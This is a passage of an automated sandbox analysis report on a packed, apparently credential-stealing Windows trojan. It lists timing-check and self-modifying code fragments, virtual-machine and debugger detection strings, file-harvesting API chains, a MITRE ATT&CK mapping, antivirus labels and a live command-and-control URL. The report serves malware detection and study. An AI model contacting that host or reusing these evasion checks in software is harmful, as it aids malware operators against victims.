              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8472A second address: B84730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84730 second address: B8476A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5444E6F507h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5444E6F505h 0x00000012 jc 00007F5444E6F4F6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C1 second address: 51F02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C5 second address: 51F02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C9 second address: 51F02CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02CF second address: 51F0307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5444E6F4FCh 0x00000013 or eax, 6F477988h 0x00000019 jmp 00007F5444E6F4FBh 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0307 second address: 51F034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5444755FABh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F5444755FABh 0x0000001e jmp 00007F5444755FB8h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F034A second address: 51F037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 jmp 00007F5444E6F4FDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5444E6F508h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F037C second address: 51F0380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0380 second address: 51F0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03D4 second address: 51F03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03DA second address: 51F0404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 mov ecx, 0A38AFC5h 0x00000015 popad 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0404 second address: 51F0408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0408 second address: 51F040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F040E second address: 51F0414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0414 second address: 51F0418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0418 second address: 51F0425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0425 second address: 51F042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 mov cx, dx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8EF88C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8EF900 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A956B3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A95ECD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A953C2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB8986 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B1E889 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_3-27317
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_3-27390
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.9 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,3_2_006B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_006BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,3_2_006C1BF0
              Source: file.exe, file.exe, 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware"
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1375859223.0000000001394000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1375859223.0000000001366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-26129
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-25975
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-25994
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-26122
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_3-26142
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging
Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006A4A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C6390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion
Source: Yara match | File source: Process Memory Space: file.exe PID: 7604, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: _tProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C2D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_006C2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information
Source: Yara match | File source: 00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7604, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality
Source: Yara match | File source: 00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7604, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (one line per tactic; the number the report shows next to a technique is kept in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (13); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Source   | Detection | Scanner        | Label
              file.exe | 39%       | ReversingLabs  | Win32.Trojan.Generic
              file.exe | 100%      | Avira          | TR/Crypt.TPM.Gen
              file.exe | 100%      | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source                    | Detection | Scanner         | Label
              http://185.215.113.206/&~ | 100%      | Avira URL Cloud | malware
              No contacted domains info
              Name                                         | Malicious | Antivirus Detection | Reputation
              http://185.215.113.206/c4becf79229cb002.php  | false     |                     | high
